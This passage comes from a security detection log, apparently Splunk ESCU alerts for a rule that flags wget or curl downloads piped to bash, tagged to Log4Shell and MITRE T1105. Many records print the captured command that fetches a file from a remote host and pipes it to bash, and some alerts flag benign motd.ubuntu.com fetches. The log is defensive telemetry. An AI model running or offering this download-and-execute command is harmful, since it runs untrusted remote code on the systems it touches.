wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718946", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:49:06", parent_process_id="10815", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10816", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718893", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:48:13", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10827", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718893", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:48:13", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10827", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718816", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:46:56", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10815", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718816", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:46:56", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10815", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642707816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642703701", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T18:35:01", parent_process_id="10240", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="10281", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642707816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642703701", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T18:35:01", parent_process_id="10240", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="10281", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", 
risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642675415, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642669055", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T08:57:35", parent_process_id="9212", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error 
https://motd.ubuntu.com", process_id="9248", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642675415, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642669055", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T08:57:35", 
parent_process_id="9212", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="9248", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or 
MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on 
